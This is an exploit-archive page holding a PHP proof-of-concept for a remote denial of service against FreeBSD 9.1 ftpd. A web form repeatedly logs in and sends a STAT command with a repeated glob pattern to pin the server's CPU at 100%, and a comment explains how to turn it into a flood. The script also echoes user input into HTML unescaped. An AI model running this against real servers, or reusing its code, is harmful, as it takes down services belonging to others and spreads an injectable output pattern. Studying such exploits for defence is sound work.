FreeBSD/GNU ftpd remote denial of service exploit

<?php
//PoC by Kacper R. from devilteam.pl
//Bug found by: Maksymilian ( cxsec.org )

set_time_limit(0); 
if(isset($_GET['runit'])){
flush();
while(1){
$fp = fsockopen($_GET['host'], $_GET['port'], $errno, $errstr, 5);
fread($fp,1024);
fwrite($fp, "USER ".$_GET['user']."\r\n"); fread($fp,1024);
fwrite($fp, "PASS ".$_GET['pass']."\r\n"); fread($fp,1024);
fwrite($fp, "STAT ".str_repeat(chr(123).chr(97).chr(44).chr(98).chr(125),64)."\r\n"); 
fclose($fp);
time_nanosleep(0,300000000);//delete to flood
flush();
}
}
if(!isset($_GET['host'])) $_GET['host']='localhost'; if(!isset($_GET['port'])) $_GET['port']='21'; if(!isset($_GET['user'])) $_GET['user']='anonymous'; if(!isset($_GET['pass'])) $_GET['pass']='anonymous';
echo '<html><head><title>FreeBSD 9.1 ftpd Remote Denial of Service</title></head><body>
<h1>FreeBSD 9.1 ftpd Remote Denial of Service</h1><P><form action="" method="GET">
<PRE>
Host: <input type="text" name="host" value="'.$_GET['host'].'">
Port: <input type="text" name="port" value="'.$_GET['port'].'">
User: <input type="text" name="user" value="'.$_GET['user'].'">
Pass: <input type="text" name="pass" value="'.$_GET['pass'].'">
</PRE>
</p>';
if(isset($_GET['confirm'])){
echo '<input type="submit" value="!!!!!!Confirm !!!!!! And click this again when stop" name="runit">';
echo '<p><br /><a href="https://devilteam.pl/"><img src="https://devilteam.pl/images/dt2.gif"></a><a href="http://cxsecurity.com/"><img src="http://cxsec.com/images/wlb/cxsecbannersmal.png" width="100" hight="40"></a>';
} else{
echo '<input type="submit" value="Create ftpd process 100% CPU" name="confirm">';
echo '<p><br /><a href="https://devilteam.pl/"><img src="https://devilteam.pl/images/dt.gif"></a><a href="http://cxsecurity.com/" ><img src="http://cxsec.com/images/wlb/cxsecbanersmal.png" width="100" hight="40"></a>';
}
echo '
</form>
</body>
</html>';
?>

Copyright ©2024 Exploitalert.